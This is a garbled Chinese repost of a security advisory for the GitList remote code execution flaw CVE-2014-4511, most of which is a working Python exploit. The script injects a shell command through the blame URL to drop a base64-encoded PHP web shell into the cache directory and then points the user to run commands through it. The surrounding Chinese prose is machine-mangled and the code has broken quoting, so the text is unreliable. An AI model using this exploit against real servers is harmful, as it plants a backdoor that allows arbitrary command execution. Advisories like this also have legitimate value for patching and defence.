GitList长途代码履行缝隙(CVE-2014-4511)wangyi - 众发娱乐

GitList长途代码履行缝隙(CVE-2014-4511)wangyi

2019-02-14 11:20:26 | 作者: 辰钊 | 标签: 代码,缝隙,厂商 | 浏览: 7402

受影响体系:
GitList GitList < 0.4.0
 GitList GitList
描绘:

BUGTRAQ  ID: 68253
 CVE(CAN) ID: CVE-2014-4511
 
GitList是用PHP编写的开源软件,是git库浏览器。
 
GitList 0.4.0之前版别在完成上存在长途代码履行缝隙,长途攻击者可利用此缝隙履行恣意代码。
 
<*来历:drone
  *>
测验办法:

警 告

以下程序(办法)或许带有攻击性,仅供安全研讨与教育之用。使用者危险自傲!


仿制代码代码如下:
from commands import getoutput
import urllib
import sys
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: <a href="https://gitlist.org/">https://gitlist.org/</a>
Software link: <a href="https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz">https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz</a>
Version: <= 0.4.0
Fixed in: 0.5.0
Tested on: Debian 7
More information: <a href="https://hatriot.github.io/blog/2014/06/29/gitlist-rce/">https://hatriot.github.io/blog/2014/06/29/gitlist-rce/</a>
cve: CVE-2014-4511
"""
if len(sys.argv) <= 1:
print %s: [url to git repo] {cache path} % sys.argv[0]
print Example: python %s <a href="https://localhost/gitlist/my_repo.git">https://localhost/gitlist/my_repo.git</a> % sys.argv[0]
print Example: python %s <a href="https://localhost/gitlist/my_repo.git">https://localhost/gitlist/my_repo.git</a> /var/www/git/cache % sys.argv[0]
sys.exit(1)
url = sys.argv[1] url = url if url[-1] != / else url[:-1]
path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
path = sys.argv[2]
print [!] Using cache location %s % path
# payload <?system($_GET[cmd]);?> payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="
# sploit; python requests does not like this URL, hence wget is used
mpath = /blame/master/""`echo {0}|base64 -d > {1}/x.php`.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if 500 in out:
print [!] Shell dropped; go hit %s/cache/x.php?cmd=ls % url.rsplit(/, 1)[0]
else:
print [-] Failed to drop
print out

主张:

厂商补丁:
 
GitList
 -
 现在厂商现已发布了晋级补丁以修正这个安全问题,请到厂商的主页下载:
 
https://gitlist.org/

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表众发娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章